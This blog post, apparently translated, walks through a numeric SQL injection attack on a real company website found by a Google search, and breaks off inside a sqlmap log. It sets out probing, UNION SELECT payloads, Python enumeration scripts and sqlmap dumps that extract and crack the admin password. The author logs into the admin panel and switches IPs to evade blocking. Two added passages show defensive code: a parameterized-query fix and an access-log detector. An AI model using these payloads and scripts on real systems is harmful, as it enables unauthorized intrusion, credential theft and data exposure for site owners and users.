
SQL Injection: A Numeric Injection Example

2020/9/19 14:05:57

Many of the sites found to have SQL injection are PHP sites. My guess is that PHP's market share is simply huge and that building a site with it is quick and convenient. It is the same as iOS versus Android, where Android is always assumed to be the less secure one, or Windows versus Linux and macOS, where Windows is always assumed to be the less secure one: the market share speaks for itself.

Use Google to find sites with injection flaws, searching with a Google hacking query: 公司 inurl:".php?id="
This matches pages ending in 公司 (company) whose URL contains .php?id=. Let's run the search and pick the first result.


First append a ' to test. The page throws an error immediately, and from the error message it is a Linux server with a MySQL database.

Continuing the tests with the HackBar plugin: no error. Testing further: an error, which shows that this field is an integer type.

?id=37 and '1'='1'

Why do I say it is an integer? Suppose the value were a string: the SQL statement would then have to end with a ' character, so the statement would look like this and would error:

select * from 表 where id='37 and '1'='1''

If it is an integer, the statement looks like this and does not error, so the field is an integer:

select * from 表 where id=37 and '1'='1'

So there is an integer injection point here; continue testing.

Use ORDER BY to determine the number of columns in the current table: 25 does not error, 26 errors, so the current table has 25 columns.

Use a UNION query to determine which positions are displayed on the page: columns 2 and 10 are output.

and 1=2 has to be added every time to make the preceding condition false, so that the original query returns no row and what the page displays comes from the SQL after it.

?id=37 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25


Replace positions 2 and 10 with database() and user(); the page outputs the database name and the account name with its host. The database is bdm266490221_db.
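
The root cause of everything above is a numeric parameter pasted straight into the SQL text, so a UNION can be appended without needing a quote. The following Python example is added here and is not code from the original post or from the affected site; it builds a throwaway SQLite database with constructed rows (table and column names chosen for the example) and shows the vulnerable lookup beside a hardened one that validates the type and binds the value as a parameter.

```python
import sqlite3

# Constructed sample schema: one public table and one sensitive table,
# mirroring the layout the walkthrough discovered. Values are placeholders.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE article(id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO article VALUES (37, 'About us', 'Company profile');
        CREATE TABLE user(id INTEGER PRIMARY KEY, name TEXT, pass TEXT);
        INSERT INTO user VALUES (1, 'admin', 'sha1-hash-placeholder');
    """)
    return conn

def lookup_vulnerable(conn, raw_id):
    """The flawed pattern: the id is concatenated into the SQL text.

    In a numeric context no closing quote is needed, so a value such as
    `37 and 1=2 union select ...` is parsed as SQL and the UNION half
    decides what the page displays.
    """
    sql = "SELECT id, title, body FROM article WHERE id=" + raw_id
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, raw_id):
    """Parameter binding alone: the value is compared as data, never parsed.

    A legitimate '37' still matches (SQLite applies the column's numeric
    affinity to the bound text); an injected payload cannot be converted
    to a number, so it simply matches nothing.
    """
    sql = "SELECT id, title, body FROM article WHERE id=?"
    return conn.execute(sql, (raw_id,)).fetchall()

def lookup_hardened(conn, raw_id):
    """Binding plus input validation: reject anything that is not a plain
    non-negative integer before the database ever sees it. Returning None
    lets the caller answer with a clean client error instead of a DBMS
    error message that leaks server and database details."""
    if not raw_id.isdecimal():
        return None
    sql = "SELECT id, title, body FROM article WHERE id=?"
    return conn.execute(sql, (int(raw_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    payload = "37 and 1=2 union select 1,name,pass from user"
    print("vulnerable   :", lookup_vulnerable(db, payload))
    print("parameterized:", lookup_parameterized(db, payload))
    print("hardened     :", lookup_hardened(db, payload))
```

Parameter binding on its own already neutralises the payload; the integer check on top rejects the request outright and gives something clean to log, instead of the database error whose text handed over the server and DBMS type at the start of this walkthrough.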


Now we can query MySQL's built-in information_schema database for information.

?id=37 and 1=2 union select 1,TABLE_NAME,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.TABLES where TABLE_SCHEMA='bdm266490221_db' limit 0,1


It errors. Very likely the ' character is filtered, so we can convert the string to hexadecimal instead.

Try again!

?id=37 and 1=2 union select 1,TABLE_NAME,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.TABLES where TABLE_SCHEMA=0x2762646d3236363439303232315f646227 limit 0,1

Still nothing is displayed. Two things are worth noting here:

1. Characters such as ' and " may not be accepted; in that case use the 0x hexadecimal form.

2. The SQL statement may be followed by further clauses; in that case use -- to comment them out, so that limit 0,1 can output the specified row.

As it stands, there is no way to use WHERE to pinpoint all the table names in the bdm266490221_db database, so I switched approach and used a script to enumerate every table name together with its database.

Use Python to build all the URLs, make the requests, and pull out the needed information with a regular expression.

and 1=2 union select 1,TABLE_SCHEMA,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.TABLES limit 0,1
```python
import re
import requests

# Walk the LIMIT offset one row at a time and pull the two displayed
# columns (positions 2 and 10) out of the page with a regular expression.
for i in range(0, 1000):
    try:
        url = """http://www.***.com/about.php?id=37 and 1=2 union select 1,TABLE_SCHEMA,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.TABLES limit %d,%d""" % (i, i + 1)
        rsp = requests.get(url=url).text
        info = re.findall(r'(?:page_bt">)(.*)(?:<)|(?:page_text">)(.*)(?:<)', rsp)
        print(info, i)
    except Exception:
        print('error:%d' % i)
```
[('information_schema', ''), ('', 'CHARACTER_SETS')] 0
[('information_schema', ''), ('', 'COLLATIONS')] 1
[('information_schema', ''), ('', 'COLLATION_CHARACTER_SET_APPLICABILITY')] 2
[('information_schema', ''), ('', 'COLUMNS')] 3
[('information_schema', ''), ('', 'COLUMN_PRIVILEGES')] 4
[('information_schema', ''), ('', 'ENGINES')] 5
[('information_schema', ''), ('', 'EVENTS')] 6
[('information_schema', ''), ('', 'FILES')] 7
[('information_schema', ''), ('', 'GLOBAL_STATUS')] 8
[('information_schema', ''), ('', 'GLOBAL_VARIABLES')] 9
[('information_schema', ''), ('', 'KEY_COLUMN_USAGE')] 10
[('information_schema', ''), ('', 'PARTITIONS')] 11
[('information_schema', ''), ('', 'PLUGINS')] 12
[('information_schema', ''), ('', 'PROCESSLIST')] 13
[('information_schema', ''), ('', 'PROFILING')] 14
[('information_schema', ''), ('', 'REFERENTIAL_CONSTRAINTS')] 15
[('information_schema', ''), ('', 'ROUTINES')] 16
[('information_schema', ''), ('', 'SCHEMATA')] 17
[('information_schema', ''), ('', 'SCHEMA_PRIVILEGES')] 18
[('information_schema', ''), ('', 'SESSION_STATUS')] 19
[('information_schema', ''), ('', 'SESSION_VARIABLES')] 20
[('information_schema', ''), ('', 'STATISTICS')] 21
[('information_schema', ''), ('', 'TABLES')] 22
[('information_schema', ''), ('', 'TABLE_CONSTRAINTS')] 23
[('information_schema', ''), ('', 'TABLE_PRIVILEGES')] 24
[('information_schema', ''), ('', 'TRIGGERS')] 25
[('information_schema', ''), ('', 'USER_PRIVILEGES')] 26
[('information_schema', ''), ('', 'VIEWS')] 27
[('bdm266490221_db', ''), ('', 'gplat_book')] 28
[('bdm266490221_db', ''), ('', 'gplat_news')] 29
[('bdm266490221_db', ''), ('', 'gplat_newsclass')] 30
[('bdm266490221_db', ''), ('', 'gplat_newsclass2')] 31
[('bdm266490221_db', ''), ('', 'href')] 32
[('bdm266490221_db', ''), ('', 'job')] 33
[('bdm266490221_db', ''), ('', 'job_add')] 34
[('bdm266490221_db', ''), ('', 'lawyer_wenda')] 35
[('bdm266490221_db', ''), ('', 'user')] 36
[('', ''), ('', '')] 37
[('', ''), ('', '')] 38
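
Every probe used so far leaves a distinctive trace in the web server's access log: a boolean condition appended to a numeric id, an ORDER BY with a bare number, UNION SELECT against information_schema, and 0x hex literals standing in for quoted strings. The following Python example is added here and is not part of the original post; it scans constructed Apache-style log lines (placeholder IP address, payload shapes taken from this section) for those indicators after URL-decoding the query string, and decodes any hex literals so an analyst can read the string that was actually being sent.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Indicator patterns, applied to each URL-decoded parameter value.
# Dict order is the order in which hits are reported.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\s*\.\s*\w+", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\b", re.I),
    "boolean_probe": re.compile(r"\b(?:and|or)\s+'?\w+'?\s*=\s*'?\w+'?", re.I),
    "time_delay": re.compile(r"\bsleep\s*\(", re.I),
    "hex_literal": re.compile(r"\b0x(?:[0-9a-f]{2}){3,}\b", re.I),
}
# Request line inside a combined/common-format access-log entry.
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/')

def decode_hex_literals(value):
    """Decode MySQL 0x... literals into the ASCII strings they carry.

    Hex literals are used to smuggle quoted strings past quote filtering,
    so the decoded form is what the analyst actually wants to read.
    """
    decoded = []
    for match in INDICATORS["hex_literal"].finditer(value):
        raw = bytes.fromhex(match.group(0)[2:])
        try:
            text = raw.decode("ascii")
        except UnicodeDecodeError:
            continue
        if text.isprintable():
            decoded.append(text)
    return decoded

def analyse_request(path_and_query):
    """Return {param: {"indicators": [...], "decoded_hex": [...]}} for
    every query parameter that triggers at least one indicator."""
    findings = {}
    query = urlsplit(path_and_query).query
    # parse_qsl decodes %XX and '+', so encoded payloads are inspected in
    # the same form the database would receive them.
    for name, value in parse_qsl(query, keep_blank_values=True):
        hits = [tag for tag, rx in INDICATORS.items() if rx.search(value)]
        if hits:
            findings[name] = {
                "indicators": hits,
                "decoded_hex": decode_hex_literals(value),
            }
    return findings

def scan_log(lines):
    """Return (line_no, param, indicators, decoded_hex) for each flagged parameter."""
    flagged = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        for param, detail in analyse_request(match.group(1)).items():
            flagged.append((lineno, param, detail["indicators"], detail["decoded_hex"]))
    return flagged

# Constructed sample log: one benign request followed by the probe shapes
# seen in this walkthrough. 203.0.113.7 is a documentation-range placeholder.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/May/2019:16:10:16 +0800] "GET /about.php?id=37 HTTP/1.1" 200 5123',
    '203.0.113.7 - - [28/May/2019:16:10:20 +0800] "GET /about.php?id=37%20and%20%271%27=%271%27 HTTP/1.1" 200 5123',
    '203.0.113.7 - - [28/May/2019:16:10:25 +0800] "GET /about.php?id=37%20order%20by%2026 HTTP/1.1" 500 312',
    '203.0.113.7 - - [28/May/2019:16:10:31 +0800] "GET /about.php?id=37%20and%201=2%20union%20select%201,TABLE_NAME,3%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA=0x2762646d3236363439303232315f646227%20limit%200,1 HTTP/1.1" 200 4980',
]

if __name__ == "__main__":
    for lineno, param, hits, hexes in scan_log(SAMPLE_LOG):
        note = f"; hex decodes to {hexes}" if hexes else ""
        print(f"line {lineno}: parameter {param!r} -> {', '.join(hits)}{note}")
```

The 500 status on the ORDER BY line is itself a useful signal: a numeric parameter that produces a server error only after a specific count is the column-counting step, and a burst of such errors from one client followed by a 200 carrying UNION SELECT is the whole sequence in miniature. Alerting on that sequence per source address catches the manual phase, which is exactly the phase sqlmap later automates.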

We can see the tables that exist in bdm266490221_db. The user table probably holds user accounts and passwords, so next query its columns, again enumerating with the script.

[('bdm266490221_db', ''), ('', 'gplat_book')] 28
[('bdm266490221_db', ''), ('', 'gplat_news')] 29
[('bdm266490221_db', ''), ('', 'gplat_newsclass')] 30
[('bdm266490221_db', ''), ('', 'gplat_newsclass2')] 31
[('bdm266490221_db', ''), ('', 'href')] 32
[('bdm266490221_db', ''), ('', 'job')] 33
[('bdm266490221_db', ''), ('', 'job_add')] 34
[('bdm266490221_db', ''), ('', 'lawyer_wenda')] 35
[('bdm266490221_db', ''), ('', 'user')] 36

Continue by enumerating the table columns, querying the column names directly.

and 1=2 union select 1,COLUMN_NAME,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.COLUMNS limit 0,1
```python
import re
import requests

# Same loop as before, now against information_schema.COLUMNS so that
# position 2 shows the column name and position 10 its table.
for i in range(0, 1000):
    try:
        url = """http://www.***.com/about.php?id=37 and 1=2 union select 1,COLUMN_NAME,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.COLUMNS limit %d,%d""" % (i, i + 1)
        rsp = requests.get(url=url).text
        info = re.findall(r'(?:page_bt">)(.*)(?:<)|(?:page_text">)(.*)(?:<)', rsp)
        print(info, i)
    except Exception:
        print('error:%d' % i)
```
[('id', ''), ('', 'gplat_book')] 315
[('ip', ''), ('', 'gplat_book')] 316
[('title', ''), ('', 'gplat_book')] 317
[('content', ''), ('', 'gplat_book')] 318
[('times', ''), ('', 'gplat_book')] 319
[('stick', ''), ('', 'gplat_book')] 320
[('class', ''), ('', 'gplat_book')] 321
[('name', ''), ('', 'gplat_book')] 322
[('up_time', ''), ('', 'gplat_book')] 323
[('view', ''), ('', 'gplat_book')] 324
[('photo', ''), ('', 'gplat_book')] 325
[('email', ''), ('', 'gplat_book')] 326
[('userid', ''), ('', 'gplat_book')] 327
[('fid', ''), ('', 'gplat_book')] 328
[('id', ''), ('', 'gplat_news')] 329
[('title', ''), ('', 'gplat_news')] 330
[('path', ''), ('', 'gplat_news')] 331
[('class', ''), ('', 'gplat_news')] 332
[('sticky', ''), ('', 'gplat_news')] 333
[('times', ''), ('', 'gplat_news')] 334
[('clickNum', ''), ('', 'gplat_news')] 335
[('author', ''), ('', 'gplat_news')] 336
[('cchu', ''), ('', 'gplat_news')] 337
[('content', ''), ('', 'gplat_news')] 338
[('introduce', ''), ('', 'gplat_news')] 339
[('img', ''), ('', 'gplat_news')] 340
[('TitleFontColor', ''), ('', 'gplat_news')] 341
[('TitleFontType', ''), ('', 'gplat_news')] 342
[('issystem', ''), ('', 'gplat_news')] 343
[('classIndex', ''), ('', 'gplat_news')] 344
[('bigimg', ''), ('', 'gplat_news')] 345
[('views', ''), ('', 'gplat_news')] 346
[('url', ''), ('', 'gplat_news')] 347
[('files', ''), ('', 'gplat_news')] 348
[('seo_title', ''), ('', 'gplat_news')] 349
[('seo_description', ''), ('', 'gplat_news')] 350
[('seo_keywords', ''), ('', 'gplat_news')] 351
[('sort', ''), ('', 'gplat_news')] 352
[('indexview', ''), ('', 'gplat_news')] 353
[('id', ''), ('', 'gplat_newsclass')] 354
[('name', ''), ('', 'gplat_newsclass')] 355
[('href', ''), ('', 'gplat_newsclass')] 356
[('classIndex', ''), ('', 'gplat_newsclass')] 357
[('issystem', ''), ('', 'gplat_newsclass')] 358
[('id', ''), ('', 'gplat_newsclass2')] 359
[('fid', ''), ('', 'gplat_newsclass2')] 360
[('name', ''), ('', 'gplat_newsclass2')] 361
[('num', ''), ('', 'gplat_newsclass2')] 362
[('classIndex', ''), ('', 'gplat_newsclass2')] 363
[('issystem', ''), ('', 'gplat_newsclass2')] 364
[('id', ''), ('', 'href')] 365
[('title', ''), ('', 'href')] 366
[('href', ''), ('', 'href')] 367
[('img', ''), ('', 'href')] 368
[('href_img', ''), ('', 'href')] 369
[('href_order', ''), ('', 'href')] 370
[('id', ''), ('', 'job')] 371
[('ip', ''), ('', 'job')] 372
[('title', ''), ('', 'job')] 373
[('content', ''), ('', 'job')] 374
[('times', ''), ('', 'job')] 375
[('stick', ''), ('', 'job')] 376
[('class_id', ''), ('', 'job')] 377
[('name', ''), ('', 'job')] 378
[('up_time', ''), ('', 'job')] 379
[('view', ''), ('', 'job')] 380
[('photo', ''), ('', 'job')] 381
[('email', ''), ('', 'job')] 382
[('id', ''), ('', 'job_add')] 383
[('ip', ''), ('', 'job_add')] 384
[('title', ''), ('', 'job_add')] 385
[('content', ''), ('', 'job_add')] 386
[('times', ''), ('', 'job_add')] 387
[('stick', ''), ('', 'job_add')] 388
[('class_id', ''), ('', 'job_add')] 389
[('name', ''), ('', 'job_add')] 390
[('up_time', ''), ('', 'job_add')] 391
[('view', ''), ('', 'job_add')] 392
[('telephone', ''), ('', 'job_add')] 393
[('email', ''), ('', 'job_add')] 394
[('sex', ''), ('', 'job_add')] 395
[('birthday', ''), ('', 'job_add')] 396
[('marry', ''), ('', 'job_add')] 397
[('school', ''), ('', 'job_add')] 398
[('studydegree', ''), ('', 'job_add')] 399
[('specialty', ''), ('', 'job_add')] 400
[('gradyear', ''), ('', 'job_add')] 401
[('address', ''), ('', 'job_add')] 402
[('resumes', ''), ('', 'job_add')] 403
[('id', ''), ('', 'lawyer_wenda')] 404
[('ip', ''), ('', 'lawyer_wenda')] 405
[('title', ''), ('', 'lawyer_wenda')] 406
[('content', ''), ('', 'lawyer_wenda')] 407
[('times', ''), ('', 'lawyer_wenda')] 408
[('stick', ''), ('', 'lawyer_wenda')] 409
[('class_id', ''), ('', 'lawyer_wenda')] 410
[('name', ''), ('', 'lawyer_wenda')] 411
[('up_time', ''), ('', 'lawyer_wenda')] 412
[('view', ''), ('', 'lawyer_wenda')] 413
[('photo', ''), ('', 'lawyer_wenda')] 414
[('email', ''), ('', 'lawyer_wenda')] 415
[('company', ''), ('', 'lawyer_wenda')] 416
[('address', ''), ('', 'lawyer_wenda')] 417
[('answer', ''), ('', 'lawyer_wenda')] 418
[('id', ''), ('', 'user')] 419
[('name', ''), ('', 'user')] 420
[('pass', ''), ('', 'user')] 421
[('email', ''), ('', 'user')] 422
[('phone', ''), ('', 'user')] 423
[('times', ''), ('', 'user')] 424
[('up_time', ''), ('', 'user')] 425
[('xingb', ''), ('', 'user')] 426
[('adder', ''), ('', 'user')] 427
[('qianming', ''), ('', 'user')] 428
[('image', ''), ('', 'user')] 429
[('grade', ''), ('', 'user')] 430
[('admin', ''), ('', 'user')] 431

We can see that name and pass are very likely the username and password, so once again construct SQL in the page to inject:

[('name', ''), ('', 'user')] 420
[('pass', ''), ('', 'user')] 421
?id=37 and 1=2 union select 1,name,3,4,5,6,7,8,9,pass,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from bdm266490221_db.user

The page then outputs admin and a string that looks like an encrypted password. I did not know which scheme it used; later sqlmap cracked it automatically and the password is 123321. So there should be a back-end admin page with the account admin and the password 123321.


Since there is an account and password, there should also be an admin URL. Run nikto -h url to scan and see what information turns up.

root@MiWiFi-R3L-srv:~# nikto -h http://www.***.com
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          60.205.33.**
+ Target Hostname:    www.***.com
+ Target Port:        80
+ Start Time:         2019-05-28 16:24:58 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ Retrieved x-powered-by header: PHP/5.2.17
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated:  20 error(s) and 12 item(s) reported on remote host
+ End Time:           2019-05-28 16:27:50 (GMT8) (172 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The scan turned up a path that could be the back-end address, and trying it confirmed it is the admin page. After logging in with the credentials, the next step would be finding a way to get a webshell, but you still must not go around causing damage. No wonder people say: learn pentesting well and you'll grow old in a cell.


This site limits repeated access from the same public IP and blocks it for a while, so during testing I kept switching IPs…

Follow the "码点小干货" WeChat official account to share and discuss all kinds of IT knowledge and tool resources.

May there always be light in your eyes! - May you become who you want to be!

Reply hackbar to the official account to get the Chrome extension, which makes SQL injection testing much easier; typing into the browser's URL bar is a real hassle because the symbols get URL-encoded every time, heh.


Afterwards I ran a sqlmap scan, and the results matched.

[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://mt.com/about.php?id=37 --dbs --delay 0.5
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.3.5.142#dev}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:10:16 /2019-05-28/

[16:10:16] [INFO] resuming back-end DBMS 'mysql'
[16:10:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=37 AND 2853=2853

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)

    Type: UNION query
    Title: Generic UNION query (NULL) - 25 columns
    Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:10:17] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:10:17] [INFO] fetching database names
[16:10:17] [INFO] used SQL query returns 2 entries
[16:10:17] [INFO] resumed: 'information_schema'
[16:10:17] [INFO] resumed: 'bdm266490221_db'
available databases [2]:
[*] bdm266490221_db
[*] information_schema

[16:10:17] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.yuebooemt.com'

[*] ending @ 16:10:17 /2019-05-28/

This dumps two database names:
available databases [2]:
[*] bdm266490221_db
[*] information_schema

2. Next, dump the table names. Since we know the database name, specify it directly:
python sqlmap.py -u http://www.**.com/about.php?id=37 -D bdm266490221_db --tables --delay 0.5

[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://www.yuebooemt.com/about.php?id=37 -D bdm266490221_db --tables --delay 0.5
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.3.5.142#dev}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:12:48 /2019-05-28/

[16:12:48] [INFO] resuming back-end DBMS 'mysql'
[16:12:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=37 AND 2853=2853

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)

    Type: UNION query
    Title: Generic UNION query (NULL) - 25 columns
    Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:12:49] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:12:49] [INFO] fetching tables for database: 'bdm266490221_db'
[16:12:49] [INFO] used SQL query returns 9 entries
[16:12:49] [INFO] resumed: 'gplat_book'
[16:12:49] [INFO] resumed: 'gplat_news'
[16:12:49] [INFO] resumed: 'gplat_newsclass'
[16:12:49] [INFO] resumed: 'gplat_newsclass2'
[16:12:49] [INFO] resumed: 'href'
[16:12:49] [INFO] resumed: 'job'
[16:12:49] [INFO] resumed: 'job_add'
[16:12:49] [INFO] resumed: 'lawyer_wenda'
[16:12:49] [INFO] resumed: 'user'
Database: bdm266490221_db
[9 tables]
+------------------+
| user             |
| gplat_book       |
| gplat_news       |
| gplat_newsclass  |
| gplat_newsclass2 |
| href             |
| job              |
| job_add          |
| lawyer_wenda     |
+------------------+

[16:12:49] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.y***.com'

[*] ending @ 16:12:49 /2019-05-28/
Nine table names were dumped; judging by the names, the one we want is the user table.

3. Dump the columns
python sqlmap.py -u http://www.***.com/about.php?id=37 -D bdm266490221_db -T user --columns --delay 0.5

[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://www.***.com/about.php?id=37 -D bdm266490221_db -T user --columns --delay 0.5
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3.5.142#dev}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:15:39 /2019-05-28/

[16:15:39] [INFO] resuming back-end DBMS 'mysql'
[16:15:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=37 AND 2853=2853

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)

    Type: UNION query
    Title: Generic UNION query (NULL) - 25 columns
    Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:15:40] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:15:40] [INFO] fetching columns for table 'user' in database 'bdm266490221_db'
[16:15:40] [INFO] used SQL query returns 13 entries
[16:15:40] [INFO] resumed: 'id','int(6)'
[16:15:40] [INFO] resumed: 'name','varchar(60)'
[16:15:40] [INFO] resumed: 'pass','varchar(60)'
[16:15:40] [INFO] resumed: 'email','varchar(60)'
[16:15:40] [INFO] resumed: 'phone','varchar(14)'
[16:15:40] [INFO] resumed: 'times','datetime'
[16:15:40] [INFO] resumed: 'up_time','datetime'
[16:15:40] [INFO] resumed: 'xingb','varchar(2)'
[16:15:40] [INFO] resumed: 'adder','varchar(8)'
[16:15:40] [INFO] resumed: 'qianming','varchar(100)'
[16:15:40] [INFO] resumed: 'image','varchar(70)'
[16:15:40] [INFO] resumed: 'grade','varchar(12)'
[16:15:40] [INFO] resumed: 'admin','int(2)'
Database: bdm266490221_db
Table: user
[13 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| adder    | varchar(8)   |
| admin    | int(2)       |
| email    | varchar(60)  |
| grade    | varchar(12)  |
| id       | int(6)       |
| image    | varchar(70)  |
| name     | varchar(60)  |
| pass     | varchar(60)  |
| phone    | varchar(14)  |
| qianming | varchar(100) |
| times    | datetime     |
| up_time  | datetime     |
| xingb    | varchar(2)   |
+----------+--------------+

[16:15:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.y**mt.com'

[*] ending @ 16:15:40 /2019-05-28/

4. Dump the contents; user and pass look like the username and password
[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://www.***.com/about.php?id=37 -D bdm266490221_db -T user -C "user,pass" --dump --delay 0.5
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.3.5.142#dev}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:18:43 /2019-05-28/

[16:18:43] [INFO] resuming back-end DBMS 'mysql'
[16:18:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=37 AND 2853=2853

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)

    Type: UNION query
    Title: Generic UNION query (NULL) - 25 columns
